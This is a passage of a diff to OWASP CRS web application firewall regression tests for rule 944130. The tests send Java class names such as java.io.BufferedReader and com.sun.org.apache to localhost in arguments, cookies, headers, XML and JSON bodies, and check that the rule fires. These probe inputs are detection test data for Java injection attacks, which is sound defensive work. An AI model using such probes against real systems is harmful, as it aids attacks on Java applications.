"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log: + expect_ids: [944130] + - test_id: 21 desc: "Content-Type application/json arg value includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"com.sun.org.apache\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"com.sun.org.apache\"}" + output: + log: + expect_ids: [944130] + - test_id: 22 desc: "Content-Type application/json arg name includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"com.sun.org.apache\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"com.sun.org.apache\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 23 desc: "Argument test includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log: + expect_ids: [944130] + - test_id: 24 desc: "Argument name includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 25 desc: "Cookie test includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.BufferedInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 26 desc: "Cookie name includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.BufferedInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 27 desc: "Request header test includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.BufferedInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 28 desc: "XML attribute value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 29 desc: "XML element value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log: + expect_ids: [944130] + - test_id: 30 desc: "Nested XML element value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log: + expect_ids: [944130] + - test_id: 31 desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log: + expect_ids: [944130] + - test_id: 32 desc: "Content-Type application/json arg value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.BufferedInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 33 desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.BufferedInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.BufferedInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 34 desc: "Argument test includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log: + expect_ids: [944130] + - test_id: 35 desc: "Argument name includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedReader=test" + output: + log: + expect_ids: [944130] + - test_id: 36 desc: "Cookie test includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.BufferedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 37 desc: "Cookie name includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.BufferedReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 38 desc: "Request header test includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.BufferedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 39 desc: "XML attribute value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 40 desc: "XML element value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log: + expect_ids: [944130] + - test_id: 41 desc: "Nested XML element value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log: + expect_ids: [944130] + - test_id: 42 desc: "Content-Type text/plain includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log: + expect_ids: [944130] + - test_id: 43 desc: "Content-Type application/json arg value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.BufferedReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 44 desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.BufferedReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.BufferedReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 45 desc: "Argument test includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log: + expect_ids: [944130] + - test_id: 46 desc: "Argument name includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 47 desc: "Cookie test includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ByteArrayInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 48 desc: "Cookie name includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 